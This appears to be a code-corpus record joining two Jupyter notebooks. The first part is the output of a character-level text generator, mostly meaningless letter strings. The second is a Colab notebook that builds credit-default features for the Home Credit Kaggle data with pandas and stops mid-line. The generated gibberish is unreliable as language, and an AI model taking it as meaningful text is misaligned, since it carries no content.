hlconaaartcltrloatnatcnpacohtroannrraayahaahthcdnotdco8nlsaweadnictthacrororwohnoarodlntlanaorhpcnrlododlorovnohcclodaaocloanhaaaaonhturoroh drniawaorhhotaaahhcooantaaronalaawolclrtnhdcwtiarnhooanlrrnthenl tttthtnracacatohtcaadrhaoainhoaanadoarocscaarohrn rannandcnnothhaaonoaolccoa eocnahtchoooalcdnsnhwo\n\n----- diversity: 1.2\n----- Generating with seed: \"ns of transition, for the sake of lighte\"\nns of transition, for the sake of lighteyldhoiddrnlybnnnooa- hlhadtrlols raamohwnahnndnoccnnewraohwcwo hohfeodhlntawrdolnhrahnahd\nyoaspacwwcncirolrrnannocrturloocahhr ydahlcairholnca-ni honovtawnatclrhvio-adorrc irrlnrhdaandha -hltcohllaatrccooctonrchrdlcohrtanowtthofhirayarnehlahaninatltortoooblhaaoosrcdddaraorahrrargrrnooctront toaooawioaorodho rnohnnclincaoxyanioiolrccigroooolaotahwa aanaieohchthaaarnwc hrhlaroihhcoc crhaarhnttco rhn\n\n--------------------------------------------------\nIteration 5\n\n----- diversity: 0.2\n----- Generating with seed: \"rateness,\nmoderation and the like come, \"\nrateness,\nmoderation and the like come, ooaaanoaaaaaaooaaaaoonaooohaaaoaaaraoahaaooaooootaaooooooaoaaooaaaaoaaaoaaaaaoaaaaaaoaooaaananaaaaaaoaaooaoooanaocoaaaaoooaaoahoaaoaoooaoaaaaaaoaaaaaanoonoaoooooaaoaoaoaonoaaaaaaaoroaaaaaoaaaannonoloaoaaaannaoaaahaaaanaoooaoooooooaoaaooanhaoooaanaaoaaaaanaaaaoaooonoahnaaaaaaoaoooaoahaaaoarooaaaaannnnaooooaaaooaoaaaoooaaaanoaahaoaoaooaoaoaoaaaaoahornaonoroaaaaaoahaaaaaaooononoonaaaaaaaoaaonaaoaooaa\n\n----- diversity: 0.5\n----- Generating with seed: \"rateness,\nmoderation and the like come, \"\nrateness,\nmoderation and the like come, noaoooaatcaraahaiatooarnharnhaaoaaohonodnarooahaalalhoaaaooahnaoooaloooooadaocadnaaoltrohnnaonaratlorncoaoaorlnnoaodaanadnrorrncocrohhchnoahaaoanaahondihochaaohaonorotraa asoarnnltnconanooatoaaoalohlooooccooaanlndrhocnaootohacaalaaancttanaroarnhtanaannaaaoalaaaralarhaonnooadlaacanaaoooaonnonoornatdaaancoaaahonnaaaoooaanoanoaaahonnaaaoaaaarcrroanhnwron oootonohaooarconohdoddnaotoalooloonhdaaaanaaha\n\n----- diversity: 1.0\n----- Generating with seed: \"rateness,\nmoderation and the like come, \"\nrateness,\nmoderation and the like come, an\ndwooahnalataccotnadoonccdslloncaltla olsdranoradcathndoncannraooalddapyhnltaahorohaiaanhorolainrrnnalhacanonnioahrtnhlannoowtoctdarah cocochlcddfnanawaneowalolhdotanhdthaaanraansaoloar dallaowhitlalohaoaa olccaolhcln asoagrl-aacdlnrtinanaiapw hhcdacodnatnraaopcaaoaaraccoa ntaraondattndlaooawnodnpatortwaoontahelnihhaorhchaiaacharooodaroccnnollaetrhloo o ahahrooarntawwrcohonaonnaohnhaao\noatlnoclr\n\n----- diversity: 1.2\n----- Generating with seed: \"rateness,\nmoderation and the like come, \"\nrateness,\nmoderation and the like come, chnngironchhnahlloawcordaldaanhc.aarcrwtonaotnlcaath\nrr arlntpiloalt aloahnclawenaoaahnoratctlsnocnrnooohil-ttwoaaonohohahdcinoohaihghanaoiaocerfdonhhothd raooonwlhc a rrthatvostancoorohnliawoeoahranodoaa-lhf ahotaacow arlroanvaohha-ol l chd\nrttirarnhditaahrrtooryor0pcao,nootl lo ynco odlgtapainaiasarnnic aa oishl owiocdntyiahlatcoalaroonchvenacdootawallddalhanniccphdrntrvhrstaoroaastachocoteelon\n\n--------------------------------------------------\nIteration 6\n\n----- diversity: 0.2\n----- Generating with seed: \"ount to noble and servile, master and sl\"\nount to noble and servile, master and slaanaoanaaaaananaaaoaahoaaaoaoaaoaaaanoohaoahoaonooaooroaaaaaoronoaoooaaanaooaaoooaaaanrhhooaaaahaoonoooaoaalaaaoaaraoahnaocaoaaaoonaooloaoaaoaaaaaaoaanoonaooaaaaoaoaaaaaaoaaoaaaaaaooaaaaaaoaaaaooaahaaaaoaaaoaaooaonooaaaaoaoaacaaaaaaaaoranraaaaoahaaaooaaaoaaaaaaaaaooaaooaooooanooaanoaoaaaaaaaalaaoaaaaaaooooaoooaaooaoanaooaaaoaaaaaoaraaaahaaoaahaoaaaaaooaoaooaaaaaaaaaoaooaaooooaaoooaaoaaanaoaoaoraaa\n\n----- diversity: 0.5\n----- Generating with seed: \"ount to noble and servile, master and sl\"\nount to noble and servile, master and slaoalhanaatoaannlcootalnaoaharhah" ], [ "\n", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ] ]
cb1ca0a7905111a78a686907b2000abe20f1ae34
68,402
ipynb
Jupyter Notebook
notebooks/CSE499A/Home_Credit_Loan.ipynb
sakibsadmanshajib/Home-Credit-Loan-Default-Risk-Analysis
1f1ef81741f1fd9467e4890a485ce774b6324f1b
[ "MIT" ]
null
null
null
notebooks/CSE499A/Home_Credit_Loan.ipynb
sakibsadmanshajib/Home-Credit-Loan-Default-Risk-Analysis
1f1ef81741f1fd9467e4890a485ce774b6324f1b
[ "MIT" ]
1
2021-04-17T16:22:04.000Z
2021-09-27T07:56:52.000Z
notebooks/CSE499A/Home_Credit_Loan.ipynb
sakibsadmanshajib/Home-Credit-Loan-Default-Risk-Analysis
1f1ef81741f1fd9467e4890a485ce774b6324f1b
[ "MIT" ]
1
2021-09-22T07:40:00.000Z
2021-09-22T07:40:00.000Z
35.150051
138
0.55706
[ [ [ "from google.colab import files\nfiles.upload()", "_____no_output_____" ], [ "!mkdir -p ~/.kaggle\n!cp kaggle.json ~/.kaggle/", "_____no_output_____" ], [ "!pip install kaggle", "_____no_output_____" ], [ "!chmod 600 /root/.kaggle/kaggle.json", "_____no_output_____" ], [ "!kaggle competitions download -c home-credit-default-risk", "_____no_output_____" ], [ "!unzip \\*.zip -d dataset", "_____no_output_____" ], [ "!rm -R sample_data", "_____no_output_____" ], [ "!rm *zip *csv", "_____no_output_____" ], [ "import os\nimport gc\nimport numpy as np\nimport pandas as pd\nimport multiprocessing as mp\nfrom scipy.stats import kurtosis\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.linear_model import LogisticRegression\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport warnings\nfrom sklearn.model_selection import train_test_split, cross_val_score, StratifiedKFold, KFold\nimport xgboost as xgb\nfrom xgboost import XGBClassifier\nfrom functools import partial\nfrom sklearn.ensemble import RandomForestClassifier\nimport lightgbm as lgb\nwarnings.simplefilter(action='ignore', category=FutureWarning)", "_____no_output_____" ], [ "DATA_DIRECTORY = \"/content/dataset\"", "_____no_output_____" ], [ "df_train = pd.read_csv(os.path.join(DATA_DIRECTORY, 'application_train.csv'))\ndf_test = pd.read_csv(os.path.join(DATA_DIRECTORY, 'application_test.csv'))\ndf = df_train.append(df_test)\ndel df_train, df_test; gc.collect()", "_____no_output_____" ], [ "df = df[df['AMT_INCOME_TOTAL'] < 20000000]\ndf = df[df['CODE_GENDER'] != 'XNA']\ndf['DAYS_EMPLOYED'].replace(365243, np.nan, inplace=True)\ndf['DAYS_LAST_PHONE_CHANGE'].replace(0, np.nan, inplace=True)", "_____no_output_____" ], [ "def get_age_group(days_birth):\n age_years = -days_birth / 365\n if age_years < 27: return 1\n elif age_years < 40: return 2\n elif age_years < 50: return 3\n elif age_years < 65: return 4\n elif age_years < 99: return 5\n else: return 0", "_____no_output_____" ], [ "docs = [f for f in df.columns if 'FLAG_DOC' in f]\ndf['DOCUMENT_COUNT'] = df[docs].sum(axis=1)\ndf['NEW_DOC_KURT'] = df[docs].kurtosis(axis=1)\ndf['AGE_RANGE'] = df['DAYS_BIRTH'].apply(lambda x: get_age_group(x))", "_____no_output_____" ], [ "df['EXT_SOURCES_PROD'] = df['EXT_SOURCE_1'] * df['EXT_SOURCE_2'] * df['EXT_SOURCE_3']\ndf['EXT_SOURCES_WEIGHTED'] = df.EXT_SOURCE_1 * 2 + df.EXT_SOURCE_2 * 1 + df.EXT_SOURCE_3 * 3\nnp.warnings.filterwarnings('ignore', r'All-NaN (slice|axis) encountered')\nfor function_name in ['min', 'max', 'mean', 'nanmedian', 'var']:\n feature_name = 'EXT_SOURCES_{}'.format(function_name.upper())\n df[feature_name] = eval('np.{}'.format(function_name))(\n df[['EXT_SOURCE_1', 'EXT_SOURCE_2', 'EXT_SOURCE_3']], axis=1)", "_____no_output_____" ], [ "df['CREDIT_TO_ANNUITY_RATIO'] = df['AMT_CREDIT'] / df['AMT_ANNUITY']\ndf['CREDIT_TO_GOODS_RATIO'] = df['AMT_CREDIT'] / df['AMT_GOODS_PRICE']\ndf['ANNUITY_TO_INCOME_RATIO'] = df['AMT_ANNUITY'] / df['AMT_INCOME_TOTAL']\ndf['CREDIT_TO_INCOME_RATIO'] = df['AMT_CREDIT'] / df['AMT_INCOME_TOTAL']\ndf['INCOME_TO_EMPLOYED_RATIO'] = df['AMT_INCOME_TOTAL'] / df['DAYS_EMPLOYED']\ndf['INCOME_TO_BIRTH_RATIO'] = df['AMT_INCOME_TOTAL'] / df['DAYS_BIRTH'] \ndf['EMPLOYED_TO_BIRTH_RATIO'] = df['DAYS_EMPLOYED'] / df['DAYS_BIRTH']\ndf['ID_TO_BIRTH_RATIO'] = df['DAYS_ID_PUBLISH'] / df['DAYS_BIRTH']\ndf['CAR_TO_BIRTH_RATIO'] = df['OWN_CAR_AGE'] / df['DAYS_BIRTH']\ndf['CAR_TO_EMPLOYED_RATIO'] = df['OWN_CAR_AGE'] / df['DAYS_EMPLOYED']\ndf['PHONE_TO_BIRTH_RATIO'] = df['DAYS_LAST_PHONE_CHANGE'] / df['DAYS_BIRTH']", "_____no_output_____" ], [ "def do_mean(df, group_cols, counted, agg_name):\n gp = df[group_cols + [counted]].groupby(group_cols)[counted].mean().reset_index().rename(\n columns={counted: agg_name})\n df = df.merge(gp, on=group_cols, how='left')\n del gp\n gc.collect()\n return df", "_____no_output_____" ], [ "def do_median(df, group_cols, counted, agg_name):\n gp = df[group_cols + [counted]].groupby(group_cols)[counted].median().reset_index().rename(\n columns={counted: agg_name})\n df = df.merge(gp, on=group_cols, how='left')\n del gp\n gc.collect()\n return df", "_____no_output_____" ], [ "def do_std(df, group_cols, counted, agg_name):\n gp = df[group_cols + [counted]].groupby(group_cols)[counted].std().reset_index().rename(\n columns={counted: agg_name})\n df = df.merge(gp, on=group_cols, how='left')\n del gp\n gc.collect()\n return df", "_____no_output_____" ], [ "def do_sum(df, group_cols, counted, agg_name):\n gp = df[group_cols + [counted]].groupby(group_cols)[counted].sum().reset_index().rename(\n columns={counted: agg_name})\n df = df.merge(gp, on=group_cols, how='left')\n del gp\n gc.collect()\n return df", "_____no_output_____" ], [ "group = ['ORGANIZATION_TYPE', 'NAME_EDUCATION_TYPE', 'OCCUPATION_TYPE', 'AGE_RANGE', 'CODE_GENDER']\ndf = do_median(df, group, 'EXT_SOURCES_MEAN', 'GROUP_EXT_SOURCES_MEDIAN')\ndf = do_std(df, group, 'EXT_SOURCES_MEAN', 'GROUP_EXT_SOURCES_STD')\ndf = do_mean(df, group, 'AMT_INCOME_TOTAL', 'GROUP_INCOME_MEAN')\ndf = do_std(df, group, 'AMT_INCOME_TOTAL', 'GROUP_INCOME_STD')\ndf = do_mean(df, group, 'CREDIT_TO_ANNUITY_RATIO', 'GROUP_CREDIT_TO_ANNUITY_MEAN')\ndf = do_std(df, group, 'CREDIT_TO_ANNUITY_RATIO', 'GROUP_CREDIT_TO_ANNUITY_STD')\ndf = do_mean(df, group, 'AMT_CREDIT', 'GROUP_CREDIT_MEAN')\ndf = do_mean(df, group, 'AMT_ANNUITY', 'GROUP_ANNUITY_MEAN')\ndf = do_std(df, group, 'AMT_ANNUITY', 'GROUP_ANNUITY_STD')", "_____no_output_____" ], [ "def label_encoder(df, categorical_columns=None):\n if not categorical_columns:\n categorical_columns = [col for col in df.columns if df[col].dtype == 'object']\n for col in categorical_columns:\n df[col], uniques = pd.factorize(df[col])\n return df, categorical_columns", "_____no_output_____" ], [ "def drop_application_columns(df):\n drop_list = [\n 'CNT_CHILDREN', 'CNT_FAM_MEMBERS', 'HOUR_APPR_PROCESS_START',\n 'FLAG_EMP_PHONE', 'FLAG_MOBIL', 'FLAG_CONT_MOBILE', 'FLAG_EMAIL', 'FLAG_PHONE',\n 'FLAG_OWN_REALTY', 'REG_REGION_NOT_LIVE_REGION', 'REG_REGION_NOT_WORK_REGION',\n 'REG_CITY_NOT_WORK_CITY', 'OBS_30_CNT_SOCIAL_CIRCLE', 'OBS_60_CNT_SOCIAL_CIRCLE',\n 'AMT_REQ_CREDIT_BUREAU_DAY', 'AMT_REQ_CREDIT_BUREAU_MON', 'AMT_REQ_CREDIT_BUREAU_YEAR', \n 'COMMONAREA_MODE', 'NONLIVINGAREA_MODE', 'ELEVATORS_MODE', 'NONLIVINGAREA_AVG',\n 'FLOORSMIN_MEDI', 'LANDAREA_MODE', 'NONLIVINGAREA_MEDI', 'LIVINGAPARTMENTS_MODE',\n 'FLOORSMIN_AVG', 'LANDAREA_AVG', 'FLOORSMIN_MODE', 'LANDAREA_MEDI',\n 'COMMONAREA_MEDI', 'YEARS_BUILD_AVG', 'COMMONAREA_AVG', 'BASEMENTAREA_AVG',\n 'BASEMENTAREA_MODE', 'NONLIVINGAPARTMENTS_MEDI', 'BASEMENTAREA_MEDI', \n 'LIVINGAPARTMENTS_AVG', 'ELEVATORS_AVG', 'YEARS_BUILD_MEDI', 'ENTRANCES_MODE',\n 'NONLIVINGAPARTMENTS_MODE', 'LIVINGAREA_MODE', 'LIVINGAPARTMENTS_MEDI',\n 'YEARS_BUILD_MODE', 'YEARS_BEGINEXPLUATATION_AVG', 'ELEVATORS_MEDI', 'LIVINGAREA_MEDI',\n 'YEARS_BEGINEXPLUATATION_MODE', 'NONLIVINGAPARTMENTS_AVG', 'HOUSETYPE_MODE',\n 'FONDKAPREMONT_MODE', 'EMERGENCYSTATE_MODE'\n ]\n for doc_num in [2,4,5,6,7,9,10,11,12,13,14,15,16,17,19,20,21]:\n drop_list.append('FLAG_DOCUMENT_{}'.format(doc_num))\n df.drop(drop_list, axis=1, inplace=True)\n return df", "_____no_output_____" ], [ "df, le_encoded_cols = label_encoder(df, None)\ndf = drop_application_columns(df)", "_____no_output_____" ], [ "#df = pd.get_dummies(df)", "_____no_output_____" ], [ "bureau = pd.read_csv(os.path.join(DATA_DIRECTORY, 'bureau.csv'))", "_____no_output_____" ], [ "bureau['CREDIT_DURATION'] = -bureau['DAYS_CREDIT'] + bureau['DAYS_CREDIT_ENDDATE']\nbureau['ENDDATE_DIF'] = bureau['DAYS_CREDIT_ENDDATE'] - bureau['DAYS_ENDDATE_FACT']\nbureau['DEBT_PERCENTAGE'] = bureau['AMT_CREDIT_SUM'] / bureau['AMT_CREDIT_SUM_DEBT']\nbureau['DEBT_CREDIT_DIFF'] = bureau['AMT_CREDIT_SUM'] - bureau['AMT_CREDIT_SUM_DEBT']\nbureau['CREDIT_TO_ANNUITY_RATIO'] = bureau['AMT_CREDIT_SUM'] / bureau['AMT_ANNUITY']", "_____no_output_____" ], [ "def one_hot_encoder(df, categorical_columns=None, nan_as_category=True):\n original_columns = list(df.columns)\n if not categorical_columns:\n categorical_columns = [col for col in df.columns if df[col].dtype == 'object']\n df = pd.get_dummies(df, columns=categorical_columns, dummy_na=nan_as_category)\n categorical_columns = [c for c in df.columns if c not in original_columns]\n return df, categorical_columns", "_____no_output_____" ], [ "def group(df_to_agg, prefix, aggregations, aggregate_by= 'SK_ID_CURR'):\n agg_df = df_to_agg.groupby(aggregate_by).agg(aggregations)\n agg_df.columns = pd.Index(['{}{}_{}'.format(prefix, e[0], e[1].upper())\n for e in agg_df.columns.tolist()])\n return agg_df.reset_index()", "_____no_output_____" ], [ "def group_and_merge(df_to_agg, df_to_merge, prefix, aggregations, aggregate_by= 'SK_ID_CURR'):\n agg_df = group(df_to_agg, prefix, aggregations, aggregate_by= aggregate_by)\n return df_to_merge.merge(agg_df, how='left', on= aggregate_by)", "_____no_output_____" ], [ "def get_bureau_balance(path, num_rows= None):\n bb = pd.read_csv(os.path.join(path, 'bureau_balance.csv'))\n bb, categorical_cols = one_hot_encoder(bb, nan_as_category= False)\n bb_processed = bb.groupby('SK_ID_BUREAU')[categorical_cols].mean().reset_index()\n agg = {'MONTHS_BALANCE': ['min', 'max', 'mean', 'size']}\n bb_processed = group_and_merge(bb, bb_processed, '', agg, 'SK_ID_BUREAU')\n del bb; gc.collect()\n return bb_processed", "_____no_output_____" ], [ "bureau, categorical_cols = one_hot_encoder(bureau, nan_as_category= False)\nbureau = bureau.merge(get_bureau_balance(DATA_DIRECTORY), how='left', on='SK_ID_BUREAU')\nbureau['STATUS_12345'] = 0\nfor i in range(1,6):\n bureau['STATUS_12345'] += bureau['STATUS_{}'.format(i)]", "_____no_output_____" ], [ "features = ['AMT_CREDIT_MAX_OVERDUE', 'AMT_CREDIT_SUM_OVERDUE', 'AMT_CREDIT_SUM',\n 'AMT_CREDIT_SUM_DEBT', 'DEBT_PERCENTAGE', 'DEBT_CREDIT_DIFF', 'STATUS_0', 'STATUS_12345']\nagg_length = bureau.groupby('MONTHS_BALANCE_SIZE')[features].mean().reset_index()\nagg_length.rename({feat: 'LL_' + feat for feat in features}, axis=1, inplace=True)\nbureau = bureau.merge(agg_length, how='left', on='MONTHS_BALANCE_SIZE')\ndel agg_length; gc.collect()", "_____no_output_____" ], [ "BUREAU_AGG = {\n 'SK_ID_BUREAU': ['nunique'],\n 'DAYS_CREDIT': ['min', 'max', 'mean'],\n 'DAYS_CREDIT_ENDDATE': ['min', 'max'],\n 'AMT_CREDIT_MAX_OVERDUE': ['max', 'mean'],\n 'AMT_CREDIT_SUM': ['max', 'mean', 'sum'],\n 'AMT_CREDIT_SUM_DEBT': ['max', 'mean', 'sum'],\n 'AMT_CREDIT_SUM_OVERDUE': ['max', 'mean', 'sum'],\n 'AMT_ANNUITY': ['mean'],\n 'DEBT_CREDIT_DIFF': ['mean', 'sum'],\n 'MONTHS_BALANCE_MEAN': ['mean', 'var'],\n 'MONTHS_BALANCE_SIZE': ['mean', 'sum'],\n 'STATUS_0': ['mean'],\n 'STATUS_1': ['mean'],\n 'STATUS_12345': ['mean'],\n 'STATUS_C': ['mean'],\n 'STATUS_X': ['mean'],\n 'CREDIT_ACTIVE_Active': ['mean'],\n 'CREDIT_ACTIVE_Closed': ['mean'],\n 'CREDIT_ACTIVE_Sold': ['mean'],\n 'CREDIT_TYPE_Consumer credit': ['mean'],\n 'CREDIT_TYPE_Credit card': ['mean'],\n 'CREDIT_TYPE_Car loan': ['mean'],\n 'CREDIT_TYPE_Mortgage': ['mean'],\n 'CREDIT_TYPE_Microloan': ['mean'],\n 'LL_AMT_CREDIT_SUM_OVERDUE': ['mean'],\n 'LL_DEBT_CREDIT_DIFF': ['mean'],\n 'LL_STATUS_12345': ['mean'],\n}\n\nBUREAU_ACTIVE_AGG = {\n 'DAYS_CREDIT': ['max', 'mean'],\n 'DAYS_CREDIT_ENDDATE': ['min', 'max'],\n 'AMT_CREDIT_MAX_OVERDUE': ['max', 'mean'],\n 'AMT_CREDIT_SUM': ['max', 'sum'],\n 'AMT_CREDIT_SUM_DEBT': ['mean', 'sum'],\n 'AMT_CREDIT_SUM_OVERDUE': ['max', 'mean'],\n 'DAYS_CREDIT_UPDATE': ['min', 'mean'],\n 'DEBT_PERCENTAGE': ['mean'],\n 'DEBT_CREDIT_DIFF': ['mean'],\n 'CREDIT_TO_ANNUITY_RATIO': ['mean'],\n 'MONTHS_BALANCE_MEAN': ['mean', 'var'],\n 'MONTHS_BALANCE_SIZE': ['mean', 'sum'],\n}\n\nBUREAU_CLOSED_AGG = {\n 'DAYS_CREDIT': ['max', 'var'],\n 'DAYS_CREDIT_ENDDATE': ['max'],\n 'AMT_CREDIT_MAX_OVERDUE': ['max', 'mean'],\n 'AMT_CREDIT_SUM_OVERDUE': ['mean'],\n 'AMT_CREDIT_SUM': ['max', 'mean', 'sum'],\n 'AMT_CREDIT_SUM_DEBT': ['max', 'sum'],\n 'DAYS_CREDIT_UPDATE': ['max'],\n 'ENDDATE_DIF': ['mean'],\n 'STATUS_12345': ['mean'],\n}\n\nBUREAU_LOAN_TYPE_AGG = {\n 'DAYS_CREDIT': ['mean', 'max'],\n 'AMT_CREDIT_MAX_OVERDUE': ['mean', 'max'],\n 'AMT_CREDIT_SUM': ['mean', 'max'],\n 'AMT_CREDIT_SUM_DEBT': ['mean', 'max'],\n 'DEBT_PERCENTAGE': ['mean'],\n 'DEBT_CREDIT_DIFF': ['mean'],\n 'DAYS_CREDIT_ENDDATE': ['max'],\n}\n\nBUREAU_TIME_AGG = {\n 'AMT_CREDIT_MAX_OVERDUE': ['max', 'mean'],\n 'AMT_CREDIT_SUM_OVERDUE': ['mean'],\n 'AMT_CREDIT_SUM': ['max', 'sum'],\n 'AMT_CREDIT_SUM_DEBT': ['mean', 'sum'],\n 'DEBT_PERCENTAGE': ['mean'],\n 'DEBT_CREDIT_DIFF': ['mean'],\n 'STATUS_0': ['mean'],\n 'STATUS_12345': ['mean'],\n}", "_____no_output_____" ], [ "agg_bureau = group(bureau, 'BUREAU_', BUREAU_AGG)\nactive = bureau[bureau['CREDIT_ACTIVE_Active'] == 1]\nagg_bureau = group_and_merge(active,agg_bureau,'BUREAU_ACTIVE_',BUREAU_ACTIVE_AGG)\nclosed = bureau[bureau['CREDIT_ACTIVE_Closed'] == 1]\nagg_bureau = group_and_merge(closed,agg_bureau,'BUREAU_CLOSED_',BUREAU_CLOSED_AGG)\ndel active, closed; gc.collect()\nfor credit_type in ['Consumer credit', 'Credit card', 'Mortgage', 'Car loan', 'Microloan']:\n type_df = bureau[bureau['CREDIT_TYPE_' + credit_type] == 1]\n prefix = 'BUREAU_' + credit_type.split(' ')[0].upper() + '_'\n agg_bureau = group_and_merge(type_df, agg_bureau, prefix, BUREAU_LOAN_TYPE_AGG)\n del type_df; gc.collect()\nfor time_frame in [6, 12]:\n prefix = \"BUREAU_LAST{}M_\".format(time_frame)\n time_frame_df = bureau[bureau['DAYS_CREDIT'] >= -30*time_frame]\n agg_bureau = group_and_merge(time_frame_df, agg_bureau, prefix, BUREAU_TIME_AGG)\n del time_frame_df; gc.collect()", "_____no_output_____" ], [ "sort_bureau = bureau.sort_values(by=['DAYS_CREDIT'])\ngr = sort_bureau.groupby('SK_ID_CURR')['AMT_CREDIT_MAX_OVERDUE'].last().reset_index()\ngr.rename({'AMT_CREDIT_MAX_OVERDUE': 'BUREAU_LAST_LOAN_MAX_OVERDUE'}, inplace=True)\nagg_bureau = agg_bureau.merge(gr, on='SK_ID_CURR', how='left')\nagg_bureau['BUREAU_DEBT_OVER_CREDIT'] = \\\n agg_bureau['BUREAU_AMT_CREDIT_SUM_DEBT_SUM']/agg_bureau['BUREAU_AMT_CREDIT_SUM_SUM']\nagg_bureau['BUREAU_ACTIVE_DEBT_OVER_CREDIT'] = \\\n agg_bureau['BUREAU_ACTIVE_AMT_CREDIT_SUM_DEBT_SUM']/agg_bureau['BUREAU_ACTIVE_AMT_CREDIT_SUM_SUM']", "_____no_output_____" ], [ "df = pd.merge(df, agg_bureau, on='SK_ID_CURR', how='left')\ndel agg_bureau, bureau\ngc.collect()", "_____no_output_____" ], [ "prev = pd.read_csv(os.path.join(DATA_DIRECTORY, 'previous_application.csv'))\npay = pd.read_csv(os.path.join(DATA_DIRECTORY, 'installments_payments.csv'))", "_____no_output_____" ], [ "PREVIOUS_AGG = {\n 'SK_ID_PREV': ['nunique'],\n 'AMT_ANNUITY': ['min', 'max', 'mean'],\n 'AMT_DOWN_PAYMENT': ['max', 'mean'],\n 'HOUR_APPR_PROCESS_START': ['min', 'max', 'mean'],\n 'RATE_DOWN_PAYMENT': ['max', 'mean'],\n 'DAYS_DECISION': ['min', 'max', 'mean'],\n 'CNT_PAYMENT': ['max', 'mean'],\n 'DAYS_TERMINATION': ['max'],\n # Engineered features\n 'CREDIT_TO_ANNUITY_RATIO': ['mean', 'max'],\n 'APPLICATION_CREDIT_DIFF': ['min', 'max', 'mean'],\n 'APPLICATION_CREDIT_RATIO': ['min', 'max', 'mean', 'var'],\n 'DOWN_PAYMENT_TO_CREDIT': ['mean'],\n}\n\nPREVIOUS_ACTIVE_AGG = {\n 'SK_ID_PREV': ['nunique'],\n 'SIMPLE_INTERESTS': ['mean'],\n 'AMT_ANNUITY': ['max', 'sum'],\n 'AMT_APPLICATION': ['max', 'mean'],\n 'AMT_CREDIT': ['sum'],\n 'AMT_DOWN_PAYMENT': ['max', 'mean'],\n 'DAYS_DECISION': ['min', 'mean'],\n 'CNT_PAYMENT': ['mean', 'sum'],\n 'DAYS_LAST_DUE_1ST_VERSION': ['min', 'max', 'mean'],\n # Engineered features\n 'AMT_PAYMENT': ['sum'],\n 'INSTALMENT_PAYMENT_DIFF': ['mean', 'max'],\n 'REMAINING_DEBT': ['max', 'mean', 'sum'],\n 'REPAYMENT_RATIO': ['mean'],\n}\nPREVIOUS_LATE_PAYMENTS_AGG = {\n 'DAYS_DECISION': ['min', 'max', 'mean'],\n 'DAYS_LAST_DUE_1ST_VERSION': ['min', 'max', 'mean'],\n # Engineered features\n 'APPLICATION_CREDIT_DIFF': ['min'],\n 'NAME_CONTRACT_TYPE_Consumer loans': ['mean'],\n 'NAME_CONTRACT_TYPE_Cash loans': ['mean'],\n 'NAME_CONTRACT_TYPE_Revolving loans': ['mean'],\n}\n\nPREVIOUS_LOAN_TYPE_AGG = {\n 'AMT_CREDIT': ['sum'],\n 'AMT_ANNUITY': ['mean', 'max'],\n 'SIMPLE_INTERESTS': ['min', 'mean', 'max', 'var'],\n 'APPLICATION_CREDIT_DIFF': ['min', 'var'],\n 'APPLICATION_CREDIT_RATIO': ['min', 'max', 'mean'],\n 'DAYS_DECISION': ['max'],\n 'DAYS_LAST_DUE_1ST_VERSION': ['max', 'mean'],\n 'CNT_PAYMENT': ['mean'],\n}\n\nPREVIOUS_TIME_AGG = {\n 'AMT_CREDIT': ['sum'],\n 'AMT_ANNUITY': ['mean', 'max'],\n 'SIMPLE_INTERESTS': ['mean', 'max'],\n 'DAYS_DECISION': ['min', 'mean'],\n 'DAYS_LAST_DUE_1ST_VERSION': ['min', 'max', 'mean'],\n # Engineered features\n 'APPLICATION_CREDIT_DIFF': ['min'],\n 'APPLICATION_CREDIT_RATIO': ['min', 'max', 'mean'],\n 'NAME_CONTRACT_TYPE_Consumer loans': ['mean'],\n 'NAME_CONTRACT_TYPE_Cash loans': ['mean'],\n 'NAME_CONTRACT_TYPE_Revolving loans': ['mean'],\n}\n\nPREVIOUS_APPROVED_AGG = {\n 'SK_ID_PREV': ['nunique'],\n 'AMT_ANNUITY': ['min', 'max', 'mean'],\n 'AMT_CREDIT': ['min', 'max', 'mean'],\n 'AMT_DOWN_PAYMENT': ['max'],\n 'AMT_GOODS_PRICE': ['max'],\n 'HOUR_APPR_PROCESS_START': ['min', 'max'],\n 'DAYS_DECISION': ['min', 'mean'],\n 'CNT_PAYMENT': ['max', 'mean'],\n 'DAYS_TERMINATION': ['mean'],\n # Engineered features\n 'CREDIT_TO_ANNUITY_RATIO': ['mean', 'max'],\n 'APPLICATION_CREDIT_DIFF': ['max'],\n 'APPLICATION_CREDIT_RATIO': ['min', 'max', 'mean'],\n # The following features are only for approved applications\n 'DAYS_FIRST_DRAWING': ['max', 'mean'],\n 'DAYS_FIRST_DUE': ['min', 'mean'],\n 'DAYS_LAST_DUE_1ST_VERSION': ['min', 'max', 'mean'],\n 'DAYS_LAST_DUE': ['max', 'mean'],\n 'DAYS_LAST_DUE_DIFF': ['min', 'max', 'mean'],\n 'SIMPLE_INTERESTS': ['min', 'max', 'mean'],\n}\n\nPREVIOUS_REFUSED_AGG = {\n 'AMT_APPLICATION': ['max', 'mean'],\n 'AMT_CREDIT': ['min', 'max'],\n 'DAYS_DECISION': ['min', 'max', 'mean'],\n 'CNT_PAYMENT': ['max', 'mean'],\n # Engineered features\n 'APPLICATION_CREDIT_DIFF': ['min', 'max', 'mean', 'var'],\n 'APPLICATION_CREDIT_RATIO': ['min', 'mean'],\n 'NAME_CONTRACT_TYPE_Consumer loans': ['mean'],\n 'NAME_CONTRACT_TYPE_Cash loans': ['mean'],\n 'NAME_CONTRACT_TYPE_Revolving loans': ['mean'],\n}\n", "_____no_output_____" ], [ "ohe_columns = [\n 'NAME_CONTRACT_STATUS', 'NAME_CONTRACT_TYPE', 'CHANNEL_TYPE',\n 'NAME_TYPE_SUITE', 'NAME_YIELD_GROUP', 'PRODUCT_COMBINATION',\n 'NAME_PRODUCT_TYPE', 'NAME_CLIENT_TYPE']\nprev, categorical_cols = one_hot_encoder(prev, ohe_columns, nan_as_category= False)", "_____no_output_____" ], [ "prev['APPLICATION_CREDIT_DIFF'] = prev['AMT_APPLICATION'] - prev['AMT_CREDIT']\nprev['APPLICATION_CREDIT_RATIO'] = prev['AMT_APPLICATION'] / prev['AMT_CREDIT']\nprev['CREDIT_TO_ANNUITY_RATIO'] = prev['AMT_CREDIT']/prev['AMT_ANNUITY']\nprev['DOWN_PAYMENT_TO_CREDIT'] = prev['AMT_DOWN_PAYMENT'] / prev['AMT_CREDIT']\ntotal_payment = prev['AMT_ANNUITY'] * prev['CNT_PAYMENT']\nprev['SIMPLE_INTERESTS'] = 